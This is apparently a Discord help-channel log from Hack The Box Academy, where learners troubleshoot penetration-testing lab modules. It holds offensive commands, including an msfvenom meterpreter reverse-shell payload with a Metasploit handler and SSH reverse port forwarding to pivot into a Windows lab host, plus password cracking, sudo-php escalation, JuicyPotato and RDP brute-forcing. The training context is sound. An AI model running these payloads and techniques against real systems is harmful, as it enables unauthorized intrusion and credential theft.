Where server disruption
did you wait a reasonable amount of time?
Wdym
did you wait 5 minutes
Read the server's name. Then Google - you will now have found out what this server is about
Ok
I wouldn't blindly join a server one of my friends tells me to join without knowing what I am in for beforehand
Is it the case that we should be able to access an instance/target spun up from the academy content, without first connecting to the academy VPN?
I think not, right? 🤷♂️
If the IP is public, it is the intended way
If the IP is 10.x.x.x - you must connect to the VPN
👍 Cheers Sparkling
🫡
Lots of 2john tools; file is a useful command as well
#welcome <--
Already turned it into a hash and cracked it, but
how am I supposed to get the contents after cracking the password?
You can mount it
You're overthinking the issue
This is a very basic module. Maybe the user can see something they shouldn't
hello, I am a beginner, so please help me with my start
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
hello
Hi! In Hacking WordPress - Attacking WordPress Users, it mentions the use of rockyou.txt in a certain folder. In the Pwnbox, I do not have that folder; is that normal? Am I supposed to get the rockyou.txt file another way?
Locate rockyou.txt
Thanks! In the end I just wget'd rockyou.txt, but I'm going to try and find it
one of the pwnbox locations is /opt/useful/seclists/Passwords/Leaked-Databases
Just finished the DNS chapter in the Footprinting module. Can anyone help me understand why we brute-force subdomains of discovered subdomains? I can't find anything in the chapter talking about it apart from the domain diagram at the top
Because some things are a.b.xyz but we can't directly query for a.b
Or more directly a zone transfer may be prohibited to b
But you can query a.b
Hey, is anyone having this issue with the SQL Injection Fundamentals unit? The "use a Union injection to get the result of 'user()'" question: I did it and hit submit, and my answer went green, but the submit button is now grayed out and it won't let me continue
tried clearing the cache and everything, plus using a different browser, and it still won't let me continue or complete the section
Bro lost his sub
nope, says I'm still subscribed to Silver
I can hit next and it will go to the next portion, but there's no green checkbox on it
also shows I have 40 out of 30 streak pts, so that's odd
it's like the form is stuck or something, super weird
might be ad block, two secs
yeah, nope, still won't go through
so weird
Any errors in the dev console?
if you just press Shift+Ctrl+R?
looking one sec
tons
Source map error: Error: request failed with status 403
Resource URL: https://academy.hackthebox.com/build/assets/app-e5c4e728.js
Source Map URL: app-e5c4e728.js.map
just one of them
I would post a screenshot but don't seem to be able to lol
Cross-Origin Request Blocked: The Same Origin Policy disallows reading the remote resource at https://api.segment.io/v1/m. (Reason: CORS request did not succeed). Status code: (null).
Error sending segment performance metrics TypeError: NetworkError when attempting to fetch resource. app-e5c4e728.js:7:241
IA https://academy.hackthebox.com/build/assets/app-e5c4e728.js:7
a https://fygapokei.hackthebox.com/htb-anal.js/v1/eLzeD0QoARKZ42pc8AGEUYpcFLpYkf0I/htb-anal.min.js:1
c https://fygapokei.hackthebox.com/htb-anal.js/v1/eLzeD0QoARKZ42pc8AGEUYpcFLpYkf0I/htb-anal.min.js:1
is another
I have a problem with the Web Requests CRUD API. If I try to use the web dev tools I can update London to flag and delete Baltimore, but when I retrieve flag the country_name is still the same
but if I use curl it works perfectly
or actually, I could get it to work in dev tools if I don't update country_name
I'm on my home connection, gigabit
sounds like social engineering
any HTB staff online who could maybe assist?
Hello, I'm Belgian and I'm having some problems with this question because of the language barrier. Can you help me by telling me what I should put, please? for the Information Security Foundations chapter : Learning Process
thank you
@fathom pendant I'm not sure what's going on here, but this person is telling everyone to DM them lol
yeaaaaaaaah it sounds like social engineering or a bot
new account, telling everyone to dm, super fishy
@gaunt scroll when you're doing the initial AXFR query on the domain, you can brute-force each subdomain the query gave you, iirc
I'll try that
caution mariana stan is a scammer
you sent me to a group where it asks me to pay by crypto
if anyone can help me
Just do some math, you can also click the hint button
thanks you
rofl my goodness
Trying to scam in a room full of hackers is a very very very bad idea
that's like trying to rob a gun store lol
@ivory quest bye bye scammer
Am I missing something with the whois command?
I cannot find the answer to my question in the module
Gotta be more specific, which module and section?
Information Gathering - Web Edition
I'm typing whois tesla.com, but my output says nothing about admin at all
Section is obviously WHOIS
Hey everyone. I'm doing the MacOS Fundamentals module, and there's a Pwnbox, but no Mac VM to go to. I can't answer their questions. Other modules have a machine to jump to. Obviously I'm working off a PC. Am I missing something?
Unfortunately not, you need a Mac machine to go through that module
We cannot virtualise Mac machines due to strict hardware restrictions on operating virtual Mac machines
Good news is so far it's only the first question that I haven't been able to answer. Still going to read through it.
Gotcha, no worries
so I tried all the subdomains again, finally found the one that I could enumerate, and got the FQDN.
Here's the rub though, that same subdomain gave me a "transfer failed" message each time I tried to "dig axfr" -- doesn't make sense
it's unclear out of context tbh;
the context becomes more clear when you realize what spoofing is, it's just claiming that your MAC address is something that it's not; which i believe was set up in the section
that's because that subdomain, the one with the sub-subdomain holding the answer, doesn't allow zone transfers (at least directly)
in a sense, transfer is prohibited
which is why the tool resorts to brute-forcing the subdomains
gtk - what's the best enum method for subdomains? I tried to dig each one
there should be a tool in that module that is useful
also not all wordlists are created equal
Yeah, I ran through the entire list of wordlists
should be a fierce wordlist that'll net you results (at least with the bruteforce tool)
but you can create a script that uses nslookup/dig to do the same
also instead of dig axfr just... dig
zone transfers aren't the ONLY way of getting info
yep, i got the fqdn I was looking for
im listening
that's all i have to say on that
🤙
it's not the only query type
I like how it goes from the fundamentals to wanting you to jump into reverse engineering Java code that is hard
and the hint says don't use the tools, de-obfuscate the code by yourself :)
Usual ARP starts off with a broadcast to get MAC addresses to be saved in the routing table; the spoofed one shows that it's possible to just send a falsified record, then force the records to be updated with another request.
I would disagree that lines 1 and 4 are evidence of ARP spoofing
but if .101 had also claimed to be AA and previously been BB, that would have been spoofing, or the other way around
now sleep, GN
🤖
Hey everyone, I'm working through Active Directory Enumeration & Attacks -> Privileged Access. I'm at the part where BloodHound is being used to enumerate which servers/workstations a particular user can RDP or WinRM to, using the built-in and custom Cypher queries.
I ran the SharpHound collector on MS01 two separate times in two separate lab deployments, and I can't reproduce the examples where the "Domain Users" group has a CanRDP edge to MS01 or the user forend has a CanWinRM edge to MS01.
BloodHound just reports "No results match your criteria." This is also preventing me from answering the questions at the end of the section, for the same reason. Any ideas?
In the module Footprinting -> Infrastructure Based Enumeration -> Domain section,
after we got the company's hosted server, which we can investigate further, why are we running it through Shodan?
what is the goal of doing so?
We use it to scan the open ports of any public devices quickly, you could probably do the same with nmap.
In the Module Information Gathering - Web Edition -> Utilising WHOIS.
Q2. What is the admin email contact for the tesla.com domain (also in-scope for the Tesla bug bounty program)?
Now when I run whois tesla.com I can't find an admin email. Is it removed from the records? What was the answer? Or am I missing something?
I read the PTT on Linux module and have a question: how are ccache files created? I understand that I may find them in /tmp, but how can I create them other than by converting from a kirbi file?
you can request a service ticket using kvno; a ccache file will be stored in the location you specify
it also gets stored when you authenticate to a kerberos server
iirc you can also use memory-based credential caching as a fun trick, to keep the ticket entirely in memory
and it disappears when the process exits
CCACHE is a credential cache file; as the name implies, it caches the credentials to save you from typing them in over and over again (used in Kerberos authentication). So instead of needing to put in a user/pass when you want to connect to a service, it first checks "hey, is there a cache? or a ticket/keytab? no? ok, well, gonna need to request one from the server"
Thanks for your insight on this, but I always overlook simple things, don't know why. Can you pinpoint how I missed it and what I should do next to get this? I have logged in as user2 and I have permission to reach /bin/bash, but I don't know how to get root access from there
be nosy; inspect things; look for stuff you shouldn't have access to like /root/ 😉 or directories within /root/
Definitely, I follow you. Keep going. I also found a private key, but I don't have the right to use it
sure you do; why not copy it over to your machine?
I have tried it, but it still doesn't allow me to execute scp, or to move to root via other options too
I would like to clarify: a .ccache is not a keytab; keytabs aren't part of the ccache mechanism
Have you set the right permissions on it? chmod 600 id_rsa
I'm currently stuck at the "Getting Started" knowledge check
i got the user.txt flag
but unable to escalate to root
I ran LinEnum and found "User www-data may run the following commands on gettingstarted:(ALL : ALL) NOPASSWD: /usr/bin/php"
then tried
www-data@gettingstarted:/usr/bin$ echo 'cat /root/root.txt' | tee -a php
echo 'cat /root/root.txt' | tee -a php
tee: php: Permission denied
The output from linenum implies that the user can run /usr/bin/php as any user (including root) without providing a password. What you are trying to do is overwriting the php binary and that's not going to work 😉
but it gave me shell to the current user only
any idea on how to go forward with it?
That's not going to work. You can't just append something to a binary and expect it to be executed.
If you want to run the php binary as root you'll need to use sudo
i tried sudo
didn't work
Hey
if you are still trying to append to the binary, that's not going to work
Eyyy it's Ryuki, I like your blogs...mad respect for the content and the style
also @nova knot:
https://gtfobins.github.io/gtfobins/php/
Has anyone gotten the SocksOverRDP plugin to work in the Pivoting, Tunneling, and Port Forwarding module? I am having issues with the plugin; I think it is not running correctly.
I am expecting a popup when I run mstsc.exe saying that the plugin is running, but I do not see it.
so when I execute the .exe on the next host it does not work
Hey guys, I have a doubt regarding "Information Gathering - Web Edition" > Utilising WHOIS - What is the admin email contact for the tesla.com domain (also in-scope for the Tesla bug bounty program)? I have tried 'whois tesla.com' but didn't get the admin email contact. In the solution the command is correct, so why is the email not showing up??
oh thank you!
I am also trying to ping the 172.16.6.155 client/server from the 2nd pivot host and it is not showing up
Hi, I'm stuck at the Password Attacks hard lab
I got the file I need to mount
I used guestmount to mount the file at /mnt/vhd, but there are no contents in there
What am i doing wrong?
I've spent about 4 hours on this section. I think I'm going to go try something else. SocksOverRDP seems like it just does not work very well.
Honestly, whois lookups via the commandline tool won't always give you the full results. If you get limited info back, you might want to check online lookups
Yes, I set the permissions, but I am still not able to access it
You're having trouble copying the file over to your machine yeah? have you tried encoding it into base64 and decoding it on the attacking machine?
I have also checked the online tools but didn't find the admin email contact. On whois.com a link is present in the Administrative Contact Email field instead of the email. That link takes us to another online whois lookup website. As I previously mentioned, in the solution to that question it is clearly stated that the student has to run 'whois tesla.com | grep "admin"' to get the answer
write in #1234357888114364508 , I guess something changed
hello lads, I'm doing the JWT Algorithm Confusion section and I'm having difficulties running Docker, since it's apparently not running. If I run systemctl start docker it asks for some credentials which I have no clue where to find; am I missing something?
I've also tried with sudo before the docker command but the same happens
Very confused
Not at all. I used an HTTP server and forwarded it with SSH, and I was able to send it to my local machine, but it still asks for a password; it doesn't work
On my local machine I have the id_rsa, but it's still asking for a password
is user2 the target user or the one you currently have access to ?
Sup
going off of this, it sounds like your current user. So you probably want someone else in your SSH command
user2 is where the flag is, and they ask to escalate to the privileges of user2 and then read the flag. There is another user, user1, the primary user, but it also still asks for a password
it might not be reading the key file correctly; try removing the barrier lines, they might be messing up the key
it's probably good to raise the attention in #1234357888114364508 as @urban elk suggested.
If you have not figured the answer out yet, mxtoolbox.com does work
you really need to write more clearly. Punctuation would help. In the previous message of yours that I referred to, it sounded like you already had user2 access, and you were now trying to escalate to root. Now it doesn't sound like that anymore
Sorry guys I never had access to user2 yet
ok, then try 0xW1LD's suggestion to check the key file
(also, no need to run ssh with sudo)
I cat the file and it starts with BEGIN and ends with END, nothing else obviously to remove
Guys, a question. Let's say you are stuck on a question in some module, like I was on the filter content curl question for days, a single question, and still was not able to solve it myself. In this kind of situation, is it worth spending hours or even days, or should I just look up the answer somewhere, understand it and move on to the next module? Because I am in the InfoSec Fundamentals path, which is a prerequisite for CPTS, so I have a lot of modules to cover; this is just a starting point. On Reddit some people say take your time and some say move on. What's your opinion?
Never spend more than 30 mins on a question, if you're stuck just ask
Time management is also a crucial skill for pentesting
and while learning it's ok to ask questions
if you're stuck, google the answer, there's no reward for being stubborn
yeah, what they said, would just add that it's personal so come up with your own threshold for how long is too long. Troubleshooting is also a crucial skill. But even if it's personal I'd find it hard to justify being stuck for more than a couple of hours
also would say it depends on what you're stuck on. Is this something completely new to you ? Definitely normal, don't stay stuck too long, search for answers, note it down, you're learning. Is this something you should know ? Keep trying for a while.
I have raised the issue in #1234357888114364508 also checked mxtoolbox.com but no correct answer found
Guys, can anybody who completed 'Information Gathering - Web Edition' explain to me how they found the answer to the second question, "What is the admin email contact for the tesla.com domain (also in-scope for the Tesla bug bounty program)?", under the "Utilising WHOIS" section?
0x08
something's changed, you used to be able to get it from running whois. You'll have to be patient, or spend some more effort researching it but knowing that this is off-scope from what they're trying to teach you
... well, I guess in a fun kinda way, it's not really
I have no idea what to do right now, guys. I have removed the key and uploaded it again to my local machine, cat'd it, and there is nothing wrong with it, and it's still asking me for a password for both users. Do you think this is a bug? Has anyone done this module specifically before, or is there another technique I should look into? I have been working on it for maybe two days and I can't get anywhere. Please let me know if you have used a different technique than logging in with the private key, so I can look into it without wasting any more time. I really appreciate you guys. Thank you so much.
try removing the:
=== BEGIN KEY===
and
=== END KEY===
lines in the key
PEM-encoded keys literally need those headers
Until it is resolved, I will move forward to the next sections 🙂
confirm your public key has a presence on the server
I occasionally have had to remove them to get them to work
you can DM me. Is the answer not accepted or did you not get anything back?
that's rare
not in this case
Ohhh, it's the Getting Started module... you shouldn't have to SSH as user2 though...
so you do have access as user2...
go back to this
and maybe take a break
I am new to this, so if you have done the Filter Contents section in Linux Fundamentals: all the questions after that section are unrelated to the section's content, especially the curl one, so I am not supposed to know it but to research it. But the thing is, it was taking a lot of time and I was getting nowhere, so I finally googled the whole question, got the answer and moved on to the next section.
But that way I won't learn anything if I google and get the answers, isn't that correct?
Only if you choose not to. If you instead choose to examine the answer, break it apart, and learn why it's the answer, then you'll still learn something
I did ask, and marcilee even helped, but said I need to google something similar so as not to get the direct answer, which I tried, and I didn't get the answer even after a lot of time
^ and in case it was something you should have known, think of why you didn't think of it, and how you might next time
when it comes to HTB, this episode is more the exception rather than the rule, from what I can tell. You tend to be given most of the information you need. This particular question is a famous outlier here
so also don't worry too much. It's good that you're asking the question
steal the wheel
Definitely I was not supposed to know it; the section didn't even mention anything related to netstat or curl, and they are asking me that question. It's like telling me a story and then asking me a question from another story, from a book in a city library, which is completely absurd
They are supposed to be a knowledge check of the section rather than totally different things
yes, it is
but this happens all the time in infosec
having to deal with missing information
I'd recommend you keep notes as a solution to this problem
I am a beginner, I don't know how to deal with this kind of thing. I do keep notes in Obsidian
Also, is it not possible to share your own notes with others? I saw a discussion in CPTS about that. I saw the Academy terms and conditions didn't say anything like that
you are sharing your own thing; how can they stop you from sharing your things with others?
the platform considers it "leaking course content"
So I cannot ask someone for their notes, even just as an example, so I can know how they are supposed to be, the format and all that?
Currently I am giving the whole section to LLMs and they summarize it for my notes; idk if that is how you are supposed to take notes
Definitely not
Notes are there to supplement your learning first, and as a reference later
bruh, who's deleting?
@untold compass we don't do that here, that's against HTB rules
so where do I do
one of us will get tired, and it won't be us
where da mods at damn
lunchtime
@storm elk ya the last one I saw active 👀
but thanks 0xW1LD for cleaning up in the meantime, that's gotta suck
How are notes supposed to be, can you show me yours as a reference
my notes are a mess, you don't want to use em as reference 
I have no idea how they are supposed to be if not llms, like there are bigass sections, llms break it and summarize
notes are there to help you remember, not to remember for you, if you just pass everything to an LLM that knowledge doesn't go through your brain it just goes straight to the pages
I know it's silly but can somebody please show me how notes are supposed to be. Since giving whole sections to llms is not a good thing to do
I want to know how to do it, any reference would work
No
I'm pretty sure this says you are user2
Oh yeah I already logged in with user2 but not root yet I’m sorry is stuck on my mind root lol and I can cd to root see the flag but cannot cat it
yeah, so, this is your problem
Yes getting root as user2
no, this was the problem with your attempt to use the private key
Yes definitely the private key did not work in either users
in at least one of your attempts, the one you showed us, you didn't use it right
This one
yep
What is the problem do I need to use my public key to log into it or how is the process?
what is that command doing ?
The command is trying to login with the private key and user2
The private key is in root directory in the Target so it worked for both users and even though I tried to login with User1 and it didn’t work for some reason and I see the authorized key that does mean they allow access to Target using the private key
you were user1, you became user2, and now you're trying to become root
Hello Everyone
I am doing now this section : https://academy.hackthebox.com/module/158/section/1427 (Remote/Reverse Port Forwarding with SSH)
I did understand everything first, and I applied the exact same procedure that is in the lesson
so first created msfvenom -p windows/x64/meterpreter/reverse_https lhost=172.16.5.129 lport=8080 -f exe -o backupscript.exe
then I did Set Up a Metasploit Listener:
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 8000
run
[*] Started HTTPS reverse handler on https://0.0.0.0:8000
I opened a new terminal and copied the backupscript.exe to the ubuntu pivot machine
scp backupscript.exe ubuntu@10.129.181.18:~/
then I ssh to that pivot ubuntu machine with dynamic port forwarding (not sure why we didn't just use the normal ssh) : ssh -D 9050 ubuntu@10.129.181.18
then I started the Python web server to serve up the msfvenom payload:
python3 -m http.server 8123
(and now here I spent around 4 hours to see how I can do the Invoke-WebRequest in the windows A, but since we don't have the user and pass, I tried a lot of things; at the end I was thinking maybe something related to the previous lesson, then I remembered the user: victor and pass: pass@123 which is not mentioned in this section, I tried it and it worked, and I logged in to windows A)
then I start powershell in Admin mode
run this command :
Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe" (to get the backupscript.exe from ubuntu to windows A) (it shows 200 - in the ubuntu pivot machine which means that the file is downloaded)
then returned back to my host attack, and opened the terminal and run this command so I can get the reverse shell
ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@10.129.171.18 -vN
and nothing happened, I feel that I did everything correct, but I am missing something here, not sure what
Here what I got
The question asked to escalate the privilege from User to
yes, it did, it's what I've been trying to say. So why are you trying to login as user2 with the key that you found
Because SSH a private key give you root access
if it's root's private key, sure. But surely you need to try to login as root, not as user2 ?
That sounds like a good idea let me try that
You need to put that backupscript.exe file on a Windows host, so not the Ubuntu machine. If you enumerate a bit you can identify another host and get it on there to make the whole thing work.
My dear, you are an excellent troubleshooter penetration tester. We got it my friend thank you so much. You save me a lot of time. I never thought about it. I tried to use User2 and User one all the time wow you don’t know how much I appreciate you my friend. Keep up the great work people like you deserve better. This is a team. I am looking for my friend. Thank you so much again.
I already have the file on a Windows host (which is Windows A in the example here)
as I mentioned I logged in to Windows host (Windows A) using proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123
and then opened powershell terminal as an Admin
and run this code
Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe"
Ok, cool, did you then execute the backupscript?
Yeah the idea is, someone runs it or maybe you create a task, etc., but inevitably, someone or thing needs to execute it.
Also, sorry about my initial response. I glanced over your question, but didn't read it completely and just assumed it was what is generally asked about that section.
THIS IS COOOOOOOL
REALLY COOL
I never thought it will work
it is totally fine
I am glad that it works now !
I was thinking actually about executing it, but then I said naaah, maybe we can just follow the lesson
but thanks !
but what is the meaning of logging in to the windows A using the password and the username, and then gaining the reverse_shell?
We already have the shell (powershell as an admin)
or maybe just for us so we learn how things work
Could be a means to establish persistence, have a better shell linked to a framework, etc.
Guys hello I didn't understand what is ACADEMY-WINLPE-SRV01? I am passing through Windows Privilege Escalation
I understood this is some kind of server but where is that server, how to log into it?
RDP is not working
Password Attacks
Network Services
I've been running Hydra for the RDP question for the last hour and a half with no results... Am I missing something? Please @ with response, thanks
If you've answered the previous questions, can you possibly enumerate the host and maybe tune your RDP attack?
Yeah I got the previous ones, I'm not sure how to tune that, but I'll look at it when I can thanks
localgroups?
Guys hello can anyone help me with my question. I am interested where I have to log in? In Windows Privilege Escalation module?!
What section?
Authenticate to 10.129.39.70 (ACADEMY-WINLPE-SRV01) with user "sql_dev" and password "Str0ng_P@ssw0rd!"
SeImpersonate and SeAssignPrimaryToken
this section
sql_dev so maybe via mssqlclient
mysql you mean?
You can use whatever you think you need to, but I would use mssqlclient.py
do the module prerequisites before the module
I did but don't remember how to use mssqlclient.py shame on me
It has a --help
I am downloading and installing impacket now I didn't have it on my kali as I found now
You probably have it as impacket-mssqlclient
Yo
No I did not as appeared installed it right now
Password Attacks :Password Reuse / Default Passwords -
I don't know what I can do with this assignment
I have Sam's user credentials, but I don't know what to do next.
What have you been doing in the previous Password Attacks sections?
password attacks
How to upload JuicyPotato there?
mutating passwords
Twin sister attack?
You've generally been performing password attacks against various services with different lists. Well, now you are given some creds, so maybe before using lists try passing those creds around against identified services. 🤷♂️
Ricky how to upload JuicyPotato there? I am a bit stuck and nc.exe also
sorry guys but I'd have to say, the Session Attacks module is hard to read, since it feels so chaotic 😄
breaks away from how the whole course is written
You can likely Google how to do it with whatever you're using to connect. You could also likely do everything using netexec too.
I connected with mssqlclient successfully but have no idea how to upload JuicyPotato there
and google also didn't give any useful information
It's time for me to make the donuts, so it's all you. netexec has a great wiki, so you can easily learn from their documentation.
Hello
I have been doing 2 million
And tried multiple ways to get reverse shell, but it aint workin
Even though the way they did in walkthrough video
are you following the CPTS path ?
I am doing free machines
I am not following any paths, I am on my own, moving also on my own without specifying some paths
in that case check out the file transfers module
Transfers didn't work here to be honest didn't manage to upload any file from my computer here
checking out netexec
Morning, maybe someone could help me with this question:
Using the skills acquired in this and previous sections, access the target host and search for the file named 'waldo.txt'. Submit the flag found within the file.
This is the module: Introduction to Windows Command Line
someone?
using the skills acquired
If you're still working on this when I get back from work I don't mind helping out. I don't recall the section, but JP can be used with impersonate so that could be the way forward. If you have questions about something, I'm gonna be on a train for a few and you can DM those questions if you'd like.
I am on stuck since 2 days
Yes I am still working on it will be thankful if you advice me how to get through it.
checking out netexec also
Good deal. Like I said you can DM if you'd like.
can I add you friendlist?
I don't really do that
Hi@everyone
understood
Hello
nobody??
Hi@everyone
Why do you keep trying this
‽
?
Having some trouble with Linux Fundamentals
Trying to curl the www.inlanefreight.com website to try and filter the return and see how many unique directories there are
I'm not getting the proper return from curl because it's protected by Wordfence
So there's seemingly no way for me to complete the question as the module is asking me to?
Not sure why it would say to use cURL when there's a plugin in place to stop it being curled?
Wordfence thinks I'm a bot I guess?
I need some hints for module password attacks:Password Reuse / Default Passwords
I tried everything, but it doesn't help
@everyone who is real hacker here?
I am trying to crack a zip file with john like this: john -w=/home/user/vmshare/password.list --rules /home/user/vmshare/custom.rule ziphash.txt it quits after 1 second and says it did not crack. If I create the pwlist upfront with hashcat --stdout -r /home/user/vmshare/custom.rule /home/user/vmshare/password.list | sort -u >pwlist.txt and use pwlist.txt it works... Why does the john with rules command not work?
why are you just saying hello, post your question, then only someone can help
making a new machine worked, weird
where are you from
Earth
which country I meant
Sorry I can't tell u
Found a forum post anyway, that question fucking sucks
This server is for htb
‽
What is this?
this is in the module Introduction to Windows Command Line?
What htb?
@fathom pendant do you have an idea, perhaps?
htb-student
do you know which server you are in
Yes
Am I not new in some little things
Yeah, but I don't know anything about hacking
I think there is something wrong on the module
I don't have that module. Has that section not taught how to search for files ? I'm finding it funny that it would have taught a Linux command instead, unless in a very specific situation that I wouldn't expect that module to get into
I don't know, that is weird or I am doing something wrong
can you help me with infosec prerequisite path
I am not new, but I am doing everything since the beginning
what's the section's name ?
Is there someone here who has finished password attacks:Password Reuse / Default Passwords
i need some help
Introduction to Windows Command Line
that's the module's name. What section is that question from
What? Can u tell me everything about this server & hacking? Pls
Finding Files and Directories
right, so I'm going to assume that the text has a command or two you can use, and that they're not the find command since this isn't Linux...
find or where is not working
this is htb server, if you want to learn or practice hack the box everyone here can help
perhaps because it's Windows? Did the section teach find and where ?
how the heck did you get on here without going to htb
this guy is here and has no idea about the server
I don't care, please don't ping
this is the question : Using the skills acquired in this and previous sections, access the target host and search for the file named 'waldo.txt'. Submit the flag found within the file.
That's right, can someone tell me how to access dark web?
yes, I know. But I'm finding it hard to believe that the section taught you bash commands to achieve this.
By Link
where did you get the link
Chrome
Dude, I'm not new in hacking, for that reason I was trying with bash commands. In that section I just found Where and find
I think there is something wrong
I meant you get the link from htb website or wherever, this is htb academy, we are here to learn stuff, I am new, ask someone else whatever you want to ask
I am using ssh to access my target and using where and find, but the file does not appear on the screen
I have just one question only one "how to access dark web" someone can tell me ?
And Why are u ignoring my question???
So that cURL question was actually a fuckin regex question in disguise
because we don't know that stuff and I told you we are here to learn htb
Download TOR, use TOR to go to an unlisted domain, congrats, you're on the dark web
What the hell
Please only ask questions here if it's related to a HTB Academy module
Can u tell me in details , I have already downloaded Tor , now what i need to do?
This is not the appropriate place to ask
Go to OnionLink, that has plenty of dark web sites indexed, type any of them in on TOR and you're on the dark web.
What is htb?
If you ask again I'll just assume you're trolling and block you
please do that
where are mods
we are here to learn and help, not to waste our and other people's time
is this the correct channel to report an issue with a vm? getting an error while attempting to rdp from both browser-attack-box (parrot) and my kali vm on vpn
module - Password Attacks - Windows Lateral Movement - Pass the Ticket from Windows
command - xfreerdp /v:10.129.86.17 /u:Administrator /p:AnotherC0mpl3xP4$$
error -
Do you trust the above certificate? (Y/T/N) y
[10:35:11:786] [5313:5340] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[10:35:11:786] [5313:5340] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[10:35:11:786] [5313:5340] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[10:35:11:786] [5313:5340] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
Sorry@everyone 😣
What kind of error do you get?
You all guys keep learning & I'm leaving this server
just updated my above message 🙂
Put the password in quotation marks
tried that as well, I'll share the output from that below as it's slightly different:
xfreerdp /v:10.129.86.17 /u:Administrator /p:"AnotherC0mpl3xP4$$"
[10:47:19:257] [22019:22020] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[10:47:19:257] [22019:22020] [WARN][com.freerdp.crypto] - CN = MS01.inlanefreight.htb
[10:47:19:458] [22019:22020] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[10:47:19:458] [22019:22020] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[10:47:19:458] [22019:22020] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[10:47:19:458] [22019:22020] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
also tried putting the common name in my hosts file, no dice though. and also tried putting the username in quotes :/
also this output i'm sharing is from the parrot browser box so def not an issue w/ my vpn
You are in Pass the Ticket, right? Wouldn't you have to log in with a ticket instead of a password?
yeah correct pass the ticket. instructions are to rdp into that host then perform pass the ticket with the tools on the windows host
Let me check my notes